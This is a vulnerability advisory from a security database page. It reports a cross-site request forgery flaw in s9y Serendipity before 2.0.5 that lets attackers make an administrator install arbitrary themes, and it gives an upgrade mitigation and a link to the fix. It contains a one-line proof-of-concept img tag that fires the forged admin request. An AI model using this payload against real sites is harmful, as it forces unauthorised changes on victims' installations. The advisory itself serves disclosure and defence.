s9y Serendipity Cross Site Request Forgery

Published
Credit
Risk
2017.04.12
Zhiyang Zeng
Low
CWE
CVE
Local
Remote
CWE-352
N/A
No
Yes

Details

======


Software: s9y Serendipity

Version: <2.0.5

Homepage: https://docs.s9y.org/


=======


Description

================

Get type CSRF in Serendipity allows attacker installs any themes, no token here.


POC:


========


include this in the page ,then attack will occur:


<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya>



Mitigations

=======


update to Serendipity v2.1.x


========


FIX:


==========


https://github.com/s9y/Serendipity/issues/452


Best regards,


Zhiyang Zeng of Tencent security platform department


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com